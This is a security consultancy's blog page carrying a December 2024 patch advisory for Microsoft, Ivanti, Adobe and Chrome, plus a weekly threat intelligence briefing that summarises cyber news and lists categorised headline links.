Threat Intelligence Blog
Contact us to discuss any insights from our Blog, and how we can support you in a tailored threat intelligence report.
Black Arrow Cyber Advisory 11 December 2024 – Microsoft, Ivanti, Adobe, and Chrome Security Updates
Black Arrow Cyber Advisory 11 December 2024 – Microsoft, Ivanti, Adobe, and Chrome Security Updates
Executive summary
In line with Microsoft’s November Patch Tuesday, several vendors, including Ivanti, Adobe, and Google, have released security updates to fix vulnerabilities in their products. Microsoft has addressed 72 security issues, including a critical Windows Common Log File System (CLFS) vulnerability that is being actively exploited. Ivanti’s updates cover its Cloud Services Application (CSA), Connect Secure, Policy Secure, and Sentry products, fixing multiple critical vulnerabilities, one of which has the highest severity rating of 10, allowing unauthorised remote attackers to gain administrative access. Adobe has released patches for 168 security issues across various products, including Experience Manager, Connect, Animate, and InDesign. Google has updated Chrome to fix three high-severity vulnerabilities in the browser.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisations data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of products that have been impacted by the various vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and all other vulnerabilities that have a critical or high severity ratings.
Microsoft
Further details on specific updates within this Microsoft patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec
Ivanti
Further details on specific updates across affected Ivanti products can be found here:
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2024-8540?language=en_US
Adobe
Further details of the vulnerabilities in affected Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
Chrome
Further details of the vulnerabilities in the Chrome Browser products can be found here:
https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_10.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 06 December 2024
Black Arrow Cyber Threat Intelligence Briefing 06 December 2024:
-Generative AI Makes Phishing Attacks More Believable and Cost-Effective
-Nearly Half a Billion Emails to Businesses Contain Malicious Content
-65% of Office Workers Bypass Cyber Security to Boost Productivity
-Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States
-INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
-Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences
-Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies
-UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs
-Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks
-Security Must Be Used as a Springboard, Not Just a Shield
-Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots
-Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Generative AI Makes Phishing Attacks More Believable and Cost-Effective
In a survey of 14,500 executives, IT and security professionals, and office workers, Avanti found that phishing is the top threat that is increasing due to generative AI. Training is a vital element of security, and although 57% of organisations say they use anti-phishing training to protect themselves from sophisticated social engineering attacks, only 32% believe that such training is “very effective”. Lack of skills is a major challenge for one in three security professionals. Real-time, accessible data is essential, yet 72% of IT and security data remain siloed.
Nearly Half a Billion Emails to Businesses Contain Malicious Content
A report by Hornetsecurity shows that over a third of all business emails in 2024 were unwanted, with 2.3% (around 427.8 million) containing malicious content. Phishing drove a third of all cyber attacks, while malicious URLs accounted for nearly a quarter. Reverse-proxy credential theft rose, using links instead of file attachments. Shipping brands like DHL and FedEx were the most impersonated. The data underscores the need for a zero-trust mindset and improved user awareness to strengthen defences against increasingly sophisticated threats.
65% of Office Workers Bypass Cyber Security to Boost Productivity
CyberArk found that 65% of office staff circumvent policies to improve their productivity, with half frequently reusing passwords and nearly a third sharing credentials. Over a third ignore important updates, and many use AI tools, often feeding sensitive data without adhering to guidelines. Senior executives are twice as likely to fall victim to phishing. The findings highlight the urgent need for identity-focused security strategies that enable efficient work while reducing risk.
Cyber Warfare Rising Across EU in Bid to 'Destabilise' Member States
EU cyber body ENISA reports a surge in hostile cyber activity across Europe, warning that escalating espionage, sabotage, violence, and disinformation threaten essential services and strategic interests. A successful attack on Europe’s key supply chains could have catastrophic cascading effects. Germany has formed a new task force to counter these threats before the federal election, while the UK’s national cyber agency confirms increased and more sophisticated hostile activity. Russia and China remain prominent cyber espionage threats. ENISA rates the threat to EU entities as “substantial”, as malicious cyber activity is deployed to manipulate events, destabilise societies, and undermine EU democracy and values.
INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
INTERPOL’s latest global cyber crime crackdown led to over 5,500 arrests and seized more than $400 million in assets. Involving 40 countries, it dismantled a voice phishing operation that stole $1.1 billion from over 1,900 victims. Criminals impersonated law enforcement, exploiting digital currencies and undermining trust in financial systems. INTERPOL also warned of new scams using stablecoins and romance-themed lures to drain victims’ wallets. These results highlight the urgent need for international collaboration to counter large-scale cyber crime and protect individuals, businesses, and the integrity of digital economies.
Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences
A new phishing campaign is using corrupted ZIP archives and Office documents to bypass email security measures. Since August 2024, attackers have exploited the built-in recovery features of popular software to open seemingly broken files. Users are tricked by false promises like employee benefits, and once opened, these documents contain QR codes redirecting victims to malicious websites. The files evade most security filters while appearing to function normally. This highlights how attackers continually search for new techniques to slip past cyber security tools and compromise organisations’ systems and data.
Russian Money Laundering Networks Uncovered Linking Narco Traffickers, Ransomware Gangs and Kremlin Spies
British authorities uncovered a vast Russian-linked money laundering system connecting drug traffickers, cyber criminals and sanctioned elites, resulting in over 80 arrests worldwide. This billion-dollar operation relied on two Moscow-based firms to shift value across 30 countries using cryptocurrency, property and other assets. More than £20 million in cash and cryptocurrency has already been seized. New sanctions target senior figures behind the networks, aiming to disrupt their access to global financial systems. The investigation revealed that narcotics gangs, Russian state-linked espionage activities and cyber criminals all benefited, posing a significant threat to global security and financial stability.
UK Underestimates Threat of Cyber Attacks from Hostile States and Gangs
The UK’s National Cyber Security Centre (NCSC) warns organisations are underestimating state and criminal cyber threats. Hostile activities have increased, with severe incidents trebling to 12 last year. Ransomware attacks remain a major concern, targeting sectors from academia to healthcare. The centre responded to 430 serious incidents, up from 371 previously. Russia’s “aggression and recklessness” and China’s “sophisticated” attacks highlight how critical national infrastructure and key services remain vulnerable. The call is clear: organisations must strengthen defences to address these evolving threats, which pose a growing risk to both economic stability and public services.
Why You Must Beware of Dangerous New Scam-Yourself Cyber Attacks
The latest report from cyber security provider Gen shows a 614% quarterly rise in ‘scam-yourself’ cyber attacks, where victims unwittingly paste malicious code themselves. Tactics include fake tutorials, deceptive tech support, false CAPTCHA prompts and bogus updates. This spike coincides with a 39% surge in data-stealing malware and a 1154% increase in a popular information stealer. Such threats are reshaping the landscape, catching millions off-guard and driving urgent attention to robust cyber security solutions. Business leaders must foster greater awareness and invest in proactive, multilayered cyber security strategies to protect their organisations.
Security Must Be Used as a Springboard, Not Just a Shield
Many organisations still view cyber security as a necessary expense rather than a growth catalyst. Research suggests that embracing it as a strategic enabler can boost productivity, build customer trust, and strengthen competitiveness. It found that nearly half of surveyed organisations suffered more than 12 hours of downtime after a cyber attack, with a third experiencing a full day’s disruption. As more connected environments emerge, security leaders must highlight metrics like uptime and customer satisfaction to board members. By doing so, cyber security becomes a driver of operational resilience and long-term success, not just a shield against threats.
Why Your Cyber Insurance May Not Cover Everything: Finding and Fixing Blind Spots
Only 1% of organisations recently surveyed received full reimbursement from their cyber insurance, and the average payout covered just 63% of incurred costs. Nearly half lacked clarity about what their policies covered. Common shortfalls arose when remediation expenses exceeded coverage limits or were not pre-approved, and when required security measures were not fully implemented. Strengthening cyber security practices increased the likelihood of better coverage, with more than three-quarters seeing improved terms after boosting cyber defences. Involving IT and security teams in insurance decisions and improving internal protections can help deliver more comprehensive and cost-effective cyber insurance in the future.
Cyber Criminals Already Using AI for Most Types of Scams, FBI Warns
The FBI warns that cyber criminals increasingly use generative AI to create believable text, images, audio, and video. This allows them to scale their cyber crime operations and trick victims by avoiding usual warning signs. Criminals impersonate trusted individuals, forge identification, and run convincing investment or donation scams. The FBI suggests using a secret word with loved ones, being cautious with personal details, and watching for subtle inconsistencies. Confirm unsolicited calls or messages by independently contacting banks or authorities, and limit sharing personal images or voice recordings online as a precaution.
Sources:
https://www.helpnetsecurity.com/2024/12/06/genai-phishing-attacks-concerns/
https://www.helpnetsecurity.com/2024/12/04/employees-privileged-access-security-risk/
https://www.irishexaminer.com/news/arid-41529398.html
https://thehackernews.com/2024/12/interpol-arrests-5500-in-global.html
https://thehackernews.com/2024/12/hackers-use-corrupted-zips-and-office.html
https://therecord.media/russian-money-laundering-networks-trafficking-cybercrime-kremlin
https://betanews.com/2024/11/29/security-must-be-used-as-a-springboard-not-just-a-shield/
https://cybernews.com/security/cybercriminals-using-ai-for-most-types-of-scams-fbi/
Governance, Risk and Compliance
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
Security must be used as a springboard, not just a shield
NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News
6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra
CISOs will face growing challenges in 2025 and beyond | Computer Weekly
CISOs in 2025: Evolution of a High-Profile Role
65% of employees bypass cyber security policies, driven by hybrid work and flexible access
Why Operational Risk Planning Is Crucial For Every SME
Large And Small Businesses Face More Serious Repercussions From Cyber Threats | HackerNoon
Incident Response Playbooks: Are You Prepared?
63% of companies plan to pass data breach costs to customers | CSO Online
Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media
How to talk to your board about tech debt | CIO
Navigating the Changing Cyber Security Regulations Landscape
The Rising Tide of Cyber Threats: Stay Ahead, Fortify Defences - The Futurum Group
Employees suffering compliance and security fatigue | theHRD
Building a robust security posture with limited resources - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Strikes when Organisations Unknowingly Open the Door | Security Info Watch
Does Cyber Insurance Drive Up Ransom Demands?
Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek
No company too small for Phobos ransomware gang, indictment reveals | Malwarebytes
Storm-1811 exploits RMM tools to drop Black Basta ransomware
Ransomware attacks on critical sectors ramped up in November | TechTarget
Hackers are pivoting from data breaches to business shutdowns
Wanted Russian Hacker Linked to Hive and LockBit Ransomware Arrested
Ransomware's Grip on Healthcare
Ransomware Costs Manufacturing Sector $17bn in Downtime - Infosecurity Magazine
Ransomware Victims
UK hospital resorts to paper and postpones procedures after cyber attack
Arrowe Park: 'Longer A&E wait times' continue after cyber attack - BBC News
Cyber attack hits three NHS Liverpool hospitals | UKAuthority
Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra
Ransomware Attack Disrupts Operations at US Contractor ENGlobal - Infosecurity Magazine
Bologna FC Hit By 200GB Data Theft and Ransom Demand - Infosecurity Magazine
Stoli Vodka and Kentucky Owl File for Bankruptcy Following Cyber Attack, Russian Seizures | NTD
Vodka maker Stoli files for bankruptcy in US after ransomware attack
Phishing & Email Based Attacks
Novel phising campaign uses corrupted Word documents to evade security
Corrupted Word Files Fuel Sophisticated Phishing Campaign - Infosecurity Magazine
This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar
This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How
Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences
Nearly half a billion emails to businesses contain malicious content, Hornet Security report finds
KnowBe4 Releases the Latest Phishing Trends Report
GenAI makes phishing attacks more believable and cost-effective - Help Net Security
New Rockstar 2FA phishing service targets Microsoft 365 accounts
North Korean Hacking Group Launches Undected Malwareless URL Phishing Attacks
HR and IT are among top-clicked phishing subjects
Top Five Industries Aggressively Targeted By Phishing Attacks
Don't Fall For This "Sad Announcement" Phishing Scam
Defending Against Email Attachment Scams - Security Boulevard
Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media
This sneaky phishing attack is a new take on a dirty old trick | PCWorld
Phishing attacks rose by more than 600% in the buildup to Black Friday | Security Magazine
Other Social Engineering
Why You Must Beware Of Dangerous New Scam-Yourself Cyber Attacks
North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC
Spotting the Charlatans: Red Flags for Enterprise Security Teams - SecurityWeek
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
Artificial Intelligence
GenAI makes phishing attacks more believable and cost-effective - Help Net Security
Cyber criminals already using AI for most types of scams, FBI warns | Cybernews
How laws strain to keep pace with AI advances and data theft | ZDNET
FBI Warns GenAI is Boosting Financial Fraud - Infosecurity Magazine
Teenagers leading new wave of cyber crime - Help Net Security
Cyber security professionals call for AI regulations
Cyber security in 2025: AI threats & zero trust focus
Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat
Treat AI like a human: Redefining cyber security - Help Net Security
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records
25% of enterprises using AI will deploy AI agents by 2025 | ZDNET
2FA/MFA
This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar
This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How
Malware
North Korean Hacking Group Launches Undected Malwareless URL Phishing Attacks
Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica
Venom Spider Spins Web of MaaS Malware
Russia's 'BlueAlpha' APT Hides in Cloudflare Tunnels
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
New Windows Backdoor Security Warning For Bing, Dropbox, Google Users
More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader
Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media
SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine
ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against Japan
Security Bite: Threat actors are widely using AI to build Mac malware - 9to5Mac
'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims
Mobile
8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play
SMEs put at risk by poor mobile security practices
New DroidBot Android malware targets 77 banking, crypto apps
Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek
FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews
The FBI now says encryption is good for you – Computerworld
NSO Group's Pegasus Spyware Detected in New Mobile Devices
Business leaders among Pegasus spyware victims, says security firm | TechCrunch
Smartphone Security Warning—Make Changes Now Or Become A Victim
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
Top 5 Mobile Security Risks for Enterprises - Zimperium
Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges
This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena
Banking apps can now require recent Android security updates
Denial of Service/DoS/DDoS
Misconfigured WAFs Heighten DoS, Breach Risks
How DDoS attacks are shaping esports security and risk management | Insurance Business America
Internet of Things – IoT
From Patchwork to Framework: Towards a Global IoT Security Paradigm - Infosecurity Magazine
Chinese LIDAR Dominance a Cyber Security Threat, Warns Think Tank - Infosecurity Magazine
Data Breaches/Leaks
Russian hacking software used to steal hundreds of MoD log-ins
760,000 Employee Records From Several Major Firms Leaked Online - SecurityWeek
Sadiq Khan admits some commuters may never be refunded after TfL cyber attack
Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online
White FAANG Data Export Attack: A Gold Mine for PII Threats
63% of companies plan to pass data breach costs to customers | CSO Online
Deloitte Hacked - Brain Cipher Group Allegedly Stolen 1 TB of Data
Process over top-down enforcement: prevent data leaks
Lessons in cyber security from the Internet Archive Breaches | TechRadar
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records
Israeli tech firm Silicom denies Iranian claims of Mossad and Unit 8200 links after c | Ctech
Controversial Andrew Tate ‘War Room’ Videos Leaked By Hackers
Organised Crime & Criminal Actors
INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
How laws strain to keep pace with AI advances and data theft | ZDNET
UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine
Alleged Snowflake Hacker ‘Danger’ to the Public
Russia gives life sentence to Hydra dark web kingpin • The Register
Venom Spider Spins Web of MaaS Malware
Teenagers leading new wave of cyber crime - Help Net Security
Cyber criminals already using AI for most types of scams, FBI warns | Cybernews
German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine
Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown
Eurocops red pill the Matrix 'secure' criminal chat systems • The Register
Police seizes largest German online crime marketplace, arrests admin
Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers
Scattered Spider Hacking Gang Arrests Mount with California Teen
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hackers Stole $1.49 Billion in Cryptocurrency to Date in 2024 - SecurityWeek
How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost
North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC
New DroidBot Android malware targets 77 banking, crypto apps
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers
Insider Risk and Insider Threats
65% of employees bypass cyber security policies, driven by hybrid work and flexible access
Inside threats: How can companies improve their cyber hygiene?
Insider Threats vs. Privacy: A Dilemma for IT Professionals
Process over top-down enforcement: prevent data leaks
Macy’s found a single employee hid up to $154 million worth of expenses | CNN Business
Insurance
Does Cyber Insurance Drive Up Ransom Demands?
Cyber insurance checklist: 12 must-have security features | SC Media
Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media
Supply Chain and Third Parties
Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar
Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra
Hardening Links in Supply Chain Security | SC Media UK
Fear of cyber attack outweighs investment in security along the supply chain - The Loadstar
Cloud/SaaS
This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar
This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How
CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media
New Rockstar 2FA phishing service targets Microsoft 365 accounts
5 things you should never back up to the cloud
New Windows Backdoor Security Warning For Bing, Dropbox, Google Users
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Outages
Identity and Access Management
The New Cyber Frontier: Managing Risks in Distributed Teams - Infosecurity Magazine
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Encryption
The Growing Quantum Threat to Enterprise Data: What Next?
FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews
The FBI now says encryption is good for you – Computerworld
This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena
Linux and Open Source
70% of open-source components are poorly or no longer maintained - Help Net Security
Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica
New Report Highlights Open Source Trends And Security Challenges
Passwords, Credential Stuffing & Brute Force Attacks
Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
Six password takeaways from the updated NIST cybersecurity framework
Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat
Social Media
Tech Support Scams Exploit Google Ads to Target Users | Tripwire
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
Romania to recount votes as TikTok slammed for election role | Stars and Stripes
Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian
Malvertising
Tech Support Scams Exploit Google Ads to Target Users | Tripwire
Regulations, Fines and Legislation
How laws strain to keep pace with AI advances and data theft | ZDNET
EC takes action as member states miss NIS2 directive deadline
NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News
6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra
DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra
New EU Regulation Establishes European 'Cyber Security Shield' - SecurityWeek
Cyber Security: Council of EU formally adopts Cybersecurity and Cyber Solidarity Act | Practical Law
Cyber security professionals call for AI regulations
Navigating the Changing Cyber Security Regulations Landscape
Employees suffering compliance and security fatigue | theHRD
Models, Frameworks and Standards
EC takes action as member states miss NIS2 directive deadline
NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News
New NIST Guidance Offers Update on Gauging Cyber Performance
DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra
Six password takeaways from the updated NIST cybersecurity framework
Careers, Working in Cyber and Information Security
Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK
Optimism About Cyber Workforce Advancements | AFCEA International
World Wide Work: Landing a Cyber Security Career Overseas
Law Enforcement Action and Take Downs
INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million
Alleged Snowflake Hacker ‘Danger’ to the Public
Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek
German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine
Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown
US arrests Scattered Spider suspect linked to telecom hacks
UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine
Misinformation, Disinformation and Propaganda
Cyber Attacks Could Impact Romanian Presidential Race, Officials Claim - Infosecurity Magazine
German intelligence agency warns of 'foreign interference' in upcoming elections
Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian
Romania to recount votes as TikTok slammed for election role | Stars and Stripes
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Cyberwarfare 2025: The rise of AI weapons, zero-days, and state-sponsored chaos
Cyber warfare rising across EU in bid to 'destablise' member states
NATO promises better strategy against cyber attacks and undersea cables – Euractiv
UK Underestimates Threat Of Cyber-Attacks, NCSC | Silicon UK
Nation State Actors
China
Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks
US government says Salt Typhoon is still in telecom networks | CyberScoop
Microsoft spots another China spy crew stealing US data • The Register
US org suffered four month intrusion by Chinese hackers
FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews
Government Guidance on Chinese Telco Hacking Highlights Threat to Cisco Devices - SecurityWeek
The FBI now says encryption is good for you – Computerworld
US shares tips to block hackers behind recent telecom breaches
T-Mobile CSO: Cyber spies' initial access method 'is novel' • The Register
US critical infrastructure, military at risk of Chinese LiDAR tech compromise | SC Media
Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024
Romania to recount votes as TikTok slammed for election role | Stars and Stripes
SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine
Russia
NATO promises better strategy against cyber attacks and undersea cables – Euractiv
‘Russia can turn the lights off’: how the UK is preparing for cyberwar | Cyberwar | The Guardian
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
Germany’s cyber security and infrastructure under attack by Russia, chancellor says – POLITICO
Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
NCA Disrupts Multi-Billion Dollar Russian Money Laundering Network
She Was a Russian Socialite and Influencer. Cops Say She’s a Crypto Laundering Kingpin | WIRED
Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024
Russian programmer says FSB agents planted spyware on his Android phone | TechCrunch
Spy v Spy: Russian APT Turla Caught Stealing From Pakistani APT - SecurityWeek
Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek
Ransomware suspect Wazawaka reportedly arrested by Russia | The Record from Recorded Future News
Russia gives life sentence to Hydra dark web kingpin • The Register
Putin and ransomware blamed for Stoli US bankruptcy filing • The Register
'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims
Romania's election systems targeted in over 85,000 cyber attacks
Russian hacking software used to steal hundreds of MoD log-ins
Iran
Kash Patel, Trump's pick to lead FBI, hit with Iranian cyber attack, sources say - ABC News
North Korea
North Korean Hacking Group Launches Undected Malwareless URL Phishing Attacks
How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost
North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC
How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn
North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks
Kimsuky Group Adopts New Phishing Tactics to Target Victims - Infosecurity Magazine
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine
Polish Central Banker Testifies in Pegasus Spyware Case – BNN Bloomberg
How widespread is mercenary spyware? More than you think - Help Net Security
Study shows potentially higher prevalence of spyware infections than previously thought | CyberScoop
NSO Group's Pegasus Spyware Detected in New Mobile Devices
Business leaders among Pegasus spyware victims, says security firm | TechCrunch
A New Phone Scanner That Detects Spyware Has Already Found 7 Pegasus Infections | WIRED
How a Russian man’s harrowing tale shows the physical dangers of spyware | CyberScoop
Tools and Controls
65% of office workers bypass cyber security to boost productivity - Help Net Security
Storm-1811 exploits RMM tools to drop Black Basta ransomware
5 reasons to double down on network security - Help Net Security
Misconfigured WAFs Heighten DoS, Breach Risks
CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media
Incident Response Playbooks: Are You Prepared?
Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Why Robust API Security is a Must for Your Business - Security Boulevard
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK
Six password takeaways from the updated NIST cybersecurity framework
Does Cyber Insurance Drive Up Ransom Demands?
Insider Threats vs. Privacy: A Dilemma for IT Professionals
New NIST Guidance Offers Update on Gauging Cyber Performance
Shorter Lifespan Reduces Digital Certificate Vulns
How to talk to your board about tech debt | CIO
Modernizing incident response in the era of cloud and AI - TechTalks
Other News
Hackers Can Access Laptop Webcams Without Activating LED Indicator
Many small businesses are falling well short when it comes to cyber security plans | TechRadar
71% of US Adults Have Dangerous Online Security Habits This Year, CNET Survey Finds - CNET
Sadiq Khan admits some commuters may never be refunded after TfL cyber attack
Your Kids Are Probably Compromising Your Online Security | Next Avenue
As Device Dependency Grows, So Do The Risks
Nordics move to deepen cyber security cooperation | Computer Weekly
Re/insurers’ operations exposed to cyber threats, says S&P - Reinsurance News
The UK’s cyber security strategy is no longer fit for purpose
Christmas is Coming: Cyber Security Lessons from the Holidays - Security Boulevard
In the new space race, hackers are hitching a ride into orbit
SQL Injection Prevention: 6 Strategies - Security Boulevard
The Legal Landscape Of Privacy: Why Lawyers Must Keep Up With Change - Above the Law
Microsoft confirms the Windows 11 TPM security requirement isn't going anywhere
Why OT environments are vulnerable – and what to do about it | SC Media
Almost all top US retailers were hacked in 2024 | Chain Store Age
Data-rich universities are both targets and treasure troves | Times Higher Education (THE)
Vulnerability Management
Microsoft Warns 400 Million PC Owners—This Ends Your Windows Updates
70% of open-source components are poorly or no longer maintained - Help Net Security
Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar
Want to Grow Vulnerability Management into Exposure Management? Start Here!
Vulnerabilities
Cisco ASA flaw CVE-2014-2120 is being exploited in the wild
Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek
Bootloader Vulnerability Impacts Over 100 Cisco Switches - SecurityWeek
Critical Vulnerability Found in Zabbix Network Monitoring Tool - SecurityWeek
CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media
Cisco Warns of Exploitation of Decade-Old ASA WebVPN Vulnerability
CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel
TP-Link Archer Zero-Day Vulnerability Let Attackers Inject Malicious Commands
Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access
PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785) - Help Net Security
CISA Warns of Zyxel Firewall Vulnerability Exploited in Attacks - SecurityWeek
CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel
Japan warns of IO-Data zero-day router flaws exploited in attacks
Rather than fixing its old routers, D-Link is telling customers to upgrade
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 29 November 2024
Black Arrow Cyber Threat Intelligence Briefing 29 November 2024:
-Phishing Attacks Dominate Threat Landscape in Q3 2024
-Rising Cyber Threat Driven by Single Point of Failure Risk
-Cloned Customer Voice Beats Bank Security Checks
-Avoiding Cyber Complacency as a Small Business
-Your IT Infrastructure May Be More Outdated Than You Think
